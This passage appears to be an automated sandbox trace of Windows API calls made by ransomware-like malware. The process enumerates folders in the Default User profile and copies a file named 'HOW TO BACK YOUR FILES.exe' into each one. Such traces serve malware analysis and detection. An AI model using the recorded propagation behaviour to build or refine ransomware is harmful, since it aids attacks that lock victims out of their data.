hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.684] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.684] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.684] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.684] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.684] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.684] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 120 [0065.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.684] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.684] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.685] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.685] GetLastError () returned 0x0 [0065.685] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.685] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.685] CloseHandle (hObject=0x120) returned 1 [0065.685] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.685] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.685] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.686] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.686] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.686] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0065.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.686] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned 86 [0065.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.686] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.686] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.687] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.687] GetLastError () returned 0x0 [0065.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.687] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.687] CloseHandle (hObject=0x120) returned 1 [0065.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.687] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.687] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.687] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.687] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" [0065.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0065.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0065.687] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials") returned 75 [0065.687] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" [0065.687] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.687] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.688] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.688] GetLastError () returned 0x0 [0065.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.688] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.688] CloseHandle (hObject=0x120) returned 1 [0065.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.688] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.688] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.688] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.688] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.689] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History" [0065.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0065.689] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\History") returned 61 [0065.689] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History" [0065.689] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.689] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.689] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.689] GetLastError () returned 0x0 [0065.689] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.689] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.690] CloseHandle (hObject=0x120) returned 1 [0065.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.690] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.690] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.690] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.690] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.690] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low" [0065.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0065.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0065.690] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low") returned 65 [0065.690] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low" [0065.690] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.690] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.691] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.691] GetLastError () returned 0x0 [0065.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.691] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.691] CloseHandle (hObject=0x120) returned 1 [0065.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.691] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.691] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.691] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.691] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.691] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5" [0065.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0065.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0065.691] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5") returned 73 [0065.691] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5" [0065.692] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.692] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.692] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.692] GetLastError () returned 0x0 [0065.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.692] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.692] CloseHandle (hObject=0x120) returned 1 [0065.692] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.692] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.692] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.693] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.693] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.693] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data" [0065.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8f28 | out: hHeap=0x2b0000) returned 1 [0065.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0065.693] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data") returned 70 [0065.693] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data" [0065.693] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.693] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.693] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.694] GetLastError () returned 0x0 [0065.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.694] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.694] CloseHandle (hObject=0x120) returned 1 [0065.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.694] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.694] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.694] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.694] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.694] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" [0065.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0065.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.694] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files") returned 95 [0065.694] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" [0065.694] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.694] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.695] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.695] GetLastError () returned 0x0 [0065.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.695] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.695] CloseHandle (hObject=0x120) returned 1 [0065.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.695] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.695] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, 